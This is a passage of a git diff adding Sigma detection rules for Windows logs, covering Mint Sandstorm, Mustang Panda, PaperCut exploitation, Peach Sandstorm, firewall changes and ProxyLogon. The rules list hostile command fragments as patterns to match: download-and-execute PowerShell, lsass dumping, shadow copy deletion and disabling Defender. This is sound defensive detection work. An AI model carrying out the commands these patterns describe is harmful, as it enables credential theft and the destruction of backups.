+ - delete + - shadowcopy + selection_child_vssadmin: + CommandLine|contains|all: + - vssadmin + - delete + - shadows + selection_child_wbadmin: + CommandLine|contains|all: + - wbadmin + - delete + - catalog + condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml new file mode 100644 index 000000000..35ef2972b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml @@ -0,0 +1,28 @@ +title: Mint Sandstorm - Log4J Wstomcat Process Execution +id: 7c97c625-0350-4f0a-8943-f6cadc88125e +status: test +description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity +references: + - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ +author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +date: 2023/04/20 +modified: 2023/11/29 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \ws_tomcatservice.exe + filter_main_repadmin: + NewProcessName|endswith: \repadmin.exe + condition: process_creation and (selection and not 1 of filter_main_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml new file mode 100644 index 000000000..eca187be5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml @@ -0,0 +1,127 @@ +title: Mint Sandstorm - ManageEngine Suspicious Process Execution +id: 58d8341a-5849-44cd-8ac8-8b020413a31b +status: test +description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm +references: + - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ +author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +date: 2023/04/20 +modified: 2023/04/25 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_parent_path: + ParentProcessName|contains: + - manageengine + - ServiceDesk + selection_parent_image: + ParentProcessName|contains: \java + selection_special_child_powershell_img: + NewProcessName|endswith: + - \powershell.exe + - \powershell_ise.exe + selection_special_child_powershell_cli: + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' + selection_special_child_lsass_1: + CommandLine|contains: lsass + selection_special_child_lsass_2: + CommandLine|contains: + - procdump + - tasklist + - findstr + selection_child_wget: + CommandLine|contains: http + NewProcessName|endswith: \wget.exe + selection_child_curl: + CommandLine|contains: http + NewProcessName|endswith: \curl.exe + selection_child_script: + CommandLine|contains: + - E:jscript + - e:vbscript + selection_child_localgroup: + CommandLine|contains|all: + - localgroup Administrators + - /add + selection_child_net: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: + - user + - /add + selection_child_reg: + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa + selection_child_wmic_1: + CommandLine|contains|all: + - wmic + - process call create + selection_child_wmic_2: + CommandLine|contains|all: + - wmic + - delete + - shadowcopy + selection_child_vssadmin: + CommandLine|contains|all: + - vssadmin + - delete + - shadows + selection_child_wbadmin: + CommandLine|contains|all: + - wbadmin + - delete + - catalog + filter_main: + CommandLine|contains|all: + - download.microsoft.com + - manageengine.com + - msiexec + condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml new file mode 100644 index 000000000..646cdeb78 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml @@ -0,0 +1,34 @@ +title: Potential APT Mustang Panda Activity Against Australian Gov +id: 7806bb49-f653-48d3-a915-5115c1a85234 +status: experimental +description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 +references: + - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/15 +tags: + - attack.execution + - attack.g0129 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + CommandLine|contains|all: + - copy SolidPDFCreator.dll + - C:\Users\Public\Libraries\PhotoTvRHD\SolidPDFCreator.dll + selection_2: + CommandLine|contains|all: + - 'reg ' + - \Windows\CurrentVersion\Run + - SolidPDF + - C:\Users\Public\Libraries\PhotoTvRHD\ + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml new file mode 100644 index 000000000..d7ae05264 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml @@ -0,0 +1,39 @@ +title: PaperCut MF/NG Exploitation Related Indicators +id: de1bd0b6-6d59-417c-86d9-a44114aede3b +status: test +description: Detects exploitation indicators related to PaperCut MF/NG Exploitation +references: + - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software + - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/04/25 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + CommandLine|contains|all: + - ' /c ' + - powershell + - -nop -w hidden + - Invoke-WebRequest + - setup.msi + - -OutFile + selection_2: + CommandLine|contains|all: + - 'msiexec ' + - '/i ' + - 'setup.msi ' + - '/qn ' + - IntegratorLogin=fimaribahundq + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml new file mode 100644 index 000000000..b5ce9df0e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml @@ -0,0 +1,45 @@ +title: PaperCut MF/NG Potential Exploitation +id: 0934ac71-a331-4e98-a034-d49c491fbbcb +status: test +description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut +references: + - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software + - https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml +author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea) +date: 2023/04/20 +modified: 2023/04/25 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \pc-app.exe + NewProcessName|endswith: + - \bash.exe + - \calc.exe + - \certutil.exe + - \cmd.exe + - \csc.exe + - \cscript.exe + - \dllhost.exe + - \mshta.exe + - \msiexec.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \scriptrunner.exe + - \wmic.exe + - \wscript.exe + - \wsl.exe + condition: process_creation and selection +falsepositives: + - Legitimate administration activity +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml new file mode 100644 index 000000000..48793077e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml @@ -0,0 +1,26 @@ +title: Peach Sandstorm APT Process Activity Indicators +id: 2e7bbd54-2f26-476e-b4a1-ba5f1a012614 +status: experimental +description: Detects process creation activity related to Peach Sandstorm APT +references: + - https://twitter.com/MsftSecIntel/status/1737895710169628824 + - https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details +author: X__Junior (Nextron Systems) +date: 2024/01/15 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: QP's\*(58vaP!tF4 + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule.yml new file mode 100644 index 000000000..b48fc1c81 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule.yml @@ -0,0 +1,41 @@ +title: New Firewall Rule Added In Windows Firewall Exception List +id: cde0a575-7d3d-4a49-9817-b8004a7bf105 +status: experimental +description: Detects when a rule has been added to the Windows Firewall exception list +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/09/09 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2004 # A rule has been added to the Windows Defender Firewall exception list + - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11) + filter_main_block: + Action: 2 + filter_main_installations: + - ApplicationPath|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + - ModifyingApplication|startswith: C:\Windows\WinSxS\ # TiWorker.exe + - ModifyingApplication: + - C:\Windows\System32\oobe\Setup.exe + - C:\Windows\SysWOW64\msiexec.exe + - C:\Windows\System32\svchost.exe + - C:\Windows\System32\dllhost.exe + - C:\Program Files\Windows Defender\MsMpEng.exe + filter_optional_msmpeng: + ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ + ModifyingApplication|endswith: \MsMpEng.exe + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml new file mode 100644 index 000000000..892edad73 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml @@ -0,0 +1,46 @@ +title: New Firewall Exception Rule Added For A Suspicious Folder +id: 9e2575e7-2cb9-4da1-adc8-ed94221dca5e +related: + - id: cde0a575-7d3d-4a49-9817-b8004a7bf105 + type: derived +status: experimental +description: Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) + - https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/# +author: frack113 +date: 2023/02/26 +modified: 2023/05/30 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2004 # A rule has been added to the Windows Defender Firewall exception list. (Windows 10) + - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11) + ApplicationPath|contains: + - \AppData\ + - \Temp\ + filter_main_block: + Action: 2 + filter_optional_teams: + ApplicationPath|endswith: \AppData\local\microsoft\teams\current\teams.exe + filter_optional_keybase: + ApplicationPath|endswith: \AppData\Local\Keybase\keybase.exe + filter_optional_messenger: + ApplicationPath|endswith: \AppData\Local\Programs\Messenger\Messenger.exe + filter_optional_opera: + ApplicationPath|startswith: C:\Users\ + ApplicationPath|contains: \AppData\Local\Programs\Opera\ + ApplicationPath|endswith: \opera.exe + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) +falsepositives: + - Any legitimate application that runs from the AppData user directory +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_change_rule.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_change_rule.yml new file mode 100644 index 000000000..94121f62b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_change_rule.yml @@ -0,0 +1,29 @@ +title: Firewall Rule Modified In The Windows Firewall Exception List +id: 5570c4d9-8fdd-4622-965b-403a5a101aa0 +status: experimental +description: Detects when a rule has been modified in the Windows firewall exception list +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/04/21 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2005 # A rule has been modified in the Windows Defender Firewall exception list (Windows 10) + - 2073 # A rule has been modified in the Windows Defender Firewall exception list. (Windows 11) + filter_main_generic: + ModifyingApplication|startswith: + - C:\Program Files (x86)\ + - C:\Program Files\ + condition: firewall_as and (selection and not 1 of filter_main_*) +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_all_rules.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_all_rules.yml new file mode 100644 index 000000000..f9ad02f30 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_all_rules.yml @@ -0,0 +1,34 @@ +title: All Rules Have Been Deleted From The Windows Firewall Configuration +id: 79609c82-a488-426e-abcf-9f341a39365d +status: experimental +description: Detects when a all the rules have been deleted from the Windows Defender Firewall configuration +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113, Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/17 +modified: 2023/04/21 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2033 # All rules have been deleted from the Windows Defender Firewall configuration on this computer + - 2059 # All rules have been deleted from the Windows Defender Firewall configuration on this computer. (Windows 11) + filter_main_generic: + ModifyingApplication|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + filter_main_svchost: + ModifyingApplication: C:\Windows\System32\svchost.exe + filter_optional_msmpeng: + ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ + ModifyingApplication|endswith: \MsMpEng.exe + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_rule.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_rule.yml new file mode 100644 index 000000000..40f5dc95b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_rule.yml @@ -0,0 +1,38 @@ +title: A Rule Has Been Deleted From The Windows Firewall Exception List +id: c187c075-bb3e-4c62-b4fa-beae0ffc211f +status: experimental +description: Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/06/12 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2006 # A rule has been deleted in the Windows Defender Firewall exception list + - 2052 # A rule has been deleted in the Windows Defender Firewall exception list. (Windows 11) + filter_main_generic: + ModifyingApplication|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + filter_main_svchost: + ModifyingApplication: C:\Windows\System32\svchost.exe + filter_optional_msmpeng: + ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ + ModifyingApplication|endswith: \MsMpEng.exe + filter_main_null: + ModifyingApplication: + filter_main_empty: + ModifyingApplication: '' + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml new file mode 100644 index 000000000..101598083 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml @@ -0,0 +1,23 @@ +title: The Windows Defender Firewall Service Failed To Load Group Policy +id: 7ec15688-fd24-4177-ba43-1a950537ee39 +status: test +description: Detects activity when The Windows Defender Firewall service failed to load Group Policy +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/01/17 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: 2009 # The Windows Defender Firewall service failed to load Group Policy + condition: firewall_as and selection +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_reset_config.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_reset_config.yml new file mode 100644 index 000000000..802f9f5bb --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_reset_config.yml @@ -0,0 +1,25 @@ +title: Windows Defender Firewall Has Been Reset To Its Default Configuration +id: 04b60639-39c0-412a-9fbe-e82499c881a3 +status: experimental +description: Detects activity when Windows Defender Firewall has been reset to its default configuration +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113 +date: 2022/02/19 +modified: 2023/04/21 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2032 # Windows Defender Firewall has been reset to its default configuration + - 2060 # Windows Defender Firewall has been reset to its default configuration. (Windows 11) + condition: firewall_as and selection +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_setting_change.yml b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_setting_change.yml new file mode 100644 index 000000000..2802ecf9a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_setting_change.yml @@ -0,0 +1,29 @@ +title: Windows Firewall Settings Have Been Changed +id: 00bb5bd5-1379-4fcf-a965-a5b6f7478064 +status: experimental +description: Detects activity when the settings of the Windows firewall have been changed +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) +author: frack113, Nasreddine Bencherchali (Nextron Systems) +date: 2022/02/19 +modified: 2023/04/21 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: windows + service: firewall-as +detection: + firewall_as: + Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall + selection: + EventID: + - 2002 # A Windows Defender Firewall setting has changed. + - 2083 # A Windows Defender Firewall setting has changed. (Windows 11) + - 2003 # A Windows Firewall setting in the profile has changed + - 2082 # A Windows Defender Firewall setting in the %1 profile has changed. (Windows 11) + - 2008 # Windows Firewall Group Policy settings have changed. The new settings have been applied + # - 2010 # Network profile changed on an interface. + condition: firewall_as and selection +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/lsa_server/win_lsa_server_normal_user_admin.yml b/tools/sigmac/converted_rules/builtin/lsa_server/win_lsa_server_normal_user_admin.yml new file mode 100644 index 000000000..3b94568d0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/lsa_server/win_lsa_server_normal_user_admin.yml @@ -0,0 +1,39 @@ +title: Standard User In High Privileged Group +id: 7ac407cc-0f48-4328-aede-de1d2e6fef41 +status: experimental +description: Detect standard users login that are part of high privileged groups such as the Administrator group +references: + - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers + - https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection + - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml +author: frack113 +date: 2023/01/13 +modified: 2023/05/05 +tags: + - attack.credential_access + - attack.privilege_escalation +logsource: + product: windows + service: lsa-server + definition: 'Requirements: Microsoft-Windows-LSA/Operational (199FE037-2B82-40A9-82AC-E1D46C792B99) Event Log must be enabled and collected in order to use this rule.' +detection: + lsa_server: + Channel: Microsoft-Windows-LSA/Operational + selection: + EventID: 300 + TargetUserSid|startswith: S-1-5-21- # Standard user + SidList|contains: + - S-1-5-32-544 # Local admin + - -500} # Domain admin + - -518} # Schema admin + - -519} # Enterprise admin + filter_main_admin: + TargetUserSid|endswith: + - '-500' # Domain admin + - '-518' # Schema admin + - '-519' # Enterprise admin + condition: lsa_server and (selection and not 1 of filter_main_*) +falsepositives: + - Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the "TargetUserName" field +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml b/tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml new file mode 100644 index 000000000..e568c3cfc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml @@ -0,0 +1,32 @@ +title: ProxyLogon MSExchange OabVirtualDirectory +id: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0 +status: test +description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory +references: + - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c +author: Florian Roth (Nextron Systems) +date: 2021/08/09 +modified: 2023/01/23 +tags: + - attack.t1587.001 + - attack.resource_development +logsource: + product: windows + service: msexchange-management +detection: + msexchange_management: + Channel: MSExchange Management + keywords_cmdlet: + '|all': + - OabVirtualDirectory + - ' -ExternalUrl ' + keywords_params: + - eval(request + - http://f/